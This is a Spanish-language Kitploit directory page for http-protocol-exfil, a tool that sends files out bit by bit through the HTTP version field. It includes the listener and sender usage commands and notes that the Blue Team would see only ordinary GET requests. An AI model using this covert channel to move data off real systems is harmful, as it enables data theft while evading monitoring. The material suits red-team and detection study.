Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
http-protocol-exfil — Exfiltrar archivos utilizando la versión del protocolo HTTP ("HTTP/1.0" es un 0 y "HTTP/1.1" es un 1) | Kitploit
Herramientas/GitHubGitHub/ricardojoserf/http-protocol-exfil
Exfiltración de DatosSeguridad de Redes
GitHubricardojoserf/http-protocol-exfil

http-protocol-exfil

Exfiltrar archivos utilizando la versión del protocolo HTTP ("HTTP/1.0" es un 0 y "HTTP/1.1" es un 1)

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
242hace 4 añosRevisado por Kitploit

http-protocol-exfil

Usa la versión del protocolo HTTP para enviar un archivo bit a bit ("HTTP/1.0" es un 0 y "HTTP/1.1" es un 1). Utiliza peticiones GET, por lo que el Blue Team solo vería las solicitudes a tu dirección IP. Sin embargo, se necesita mucho tiempo para enviar archivos grandes; por ejemplo, requiere 1 hora para enviar 200 KB, y la cantidad de peticiones sería muy alta (8 veces el número de bytes del archivo).

memillo

Crear el listener

Para ejecutar el listener, usa listener.py con un argumento opcional: el puerto en el que escuchará.

root@kitploit:~
python3 listener.py [PORT]

Ejemplo:

root@kitploit:~
python3 listener.py 8080

Enviar un archivo

Para enviar un archivo, usa sender.py con dos argumentos obligatorios: la ruta del archivo y la URL del listener; y un argumento opcional: el nombre del archivo creado remotamente (si no se usa, se emplea el nombre del archivo de entrada).

root@kitploit:~
python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]

Ejemplo:

root@kitploit:~
python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt

Ejemplo

Primero se envía el archivo:

image1

Si la variable debug está configurada como True (lo está por defecto), puedes ver los valores binarios en los mensajes de registro del listener:

image2

El nuevo archivo se crea con el contenido del archivo de entrada:

image3


Motivación

Creo (no estoy seguro) que leí a alguien en Twitter que afirmaba haber usado esto para exfiltrar datos y me gustó la idea; si eres esa persona, házmelo saber.

Descargar herramienta